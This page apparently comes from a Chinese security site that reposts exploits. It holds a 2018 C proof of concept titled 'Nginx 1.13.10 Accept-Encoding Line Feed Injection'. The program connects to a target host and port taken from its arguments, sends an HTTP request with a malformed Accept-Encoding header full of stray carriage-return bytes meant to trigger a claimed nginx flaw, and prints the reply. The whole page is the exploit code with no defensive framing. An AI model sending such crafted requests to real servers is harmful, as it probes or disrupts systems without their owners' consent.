首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nginx 1.13.10 Accept-Encoding Line Feed Injection
来源:keliikoakirland at gmail.com 作者:Kirland 发布时间:2018-04-03  
// Underground_Agency (UA) - (koa, bacL, g3kko, Dostoyevsky)

// trigger nginx 1.13.10 (latest) logic flaw / bug
// ~2018

// Tested on Ubuntu 17.10 x86 4.13.0-21-generic

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <time.h>

int main(int argc, char **argv){
    int sockfd, ret;
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if(sockfd < 0){
        perror("socket");
        exit(EXIT_FAILURE);
    }

    struct sockaddr_in servAddr;
    memset(&servAddr, 0, sizeof(servAddr));
    servAddr.sin_family = AF_INET;
    servAddr.sin_port = htons(atoi(argv[2]));
    servAddr.sin_addr.s_addr = inet_addr(argv[1]);

    ret = connect(sockfd, (struct sockaddr *)&servAddr, sizeof(servAddr));
    if(ret < 0){
        perror("connect");
        exit(EXIT_FAILURE);
    }

    char buf[2048];

    strcpy(buf, "GET / HTTP/1.1\r\nHost: ");
    strcat(buf, argv[1]);
    strcat(buf, "\r\n");
    strcat(buf, "Connection: close\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\r\n");

    char *buf2 = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
                 "Accept-Encoding: gzip, deflate\r\n\rrrrr\r\r\r\r\\rr\rrrrrr" // bug
                 "Accept-Language: en-US,en;q=0.9\r\n\r\n";

    strcat(buf, buf2);

    char recvbuf[1024];

    ret = send(sockfd, buf, strlen(buf), 0);
    if(ret < 0){
        perror("send");
        exit(EXIT_FAILURE);
    }

    printf("Successfully sent data\n");

    ret = recv(sockfd, recvbuf, 1024, 0);
    if(ret < 0){
        perror("recv");
        exit(EXIT_FAILURE);
    }

    printf("Data: %s\n", recvbuf);

    close(sockfd);
    exit(EXIT_SUCCESS);
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·glibc LD_AUDIT libmemusage.so
·Google Chrome V8 - 'ElementsAc
·Faleemi Windows Desktop Softwa
·Vtiger CRM 6.3.0 - Authenticat
·Advantech WebAccess < 8.1 - we
·Systematic SitAware - NVG Deni
·osCommerce 2.3.4.1 - Remote Co
·Homematic CCU2 2.29.23 - Remot
·Allok Video Joiner 4.6.1217 -
·Homematic CCU2 2.29.23 - Arbit
·ManageEngine Application Manag
·Tenda W308R V2 Wireless Router
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved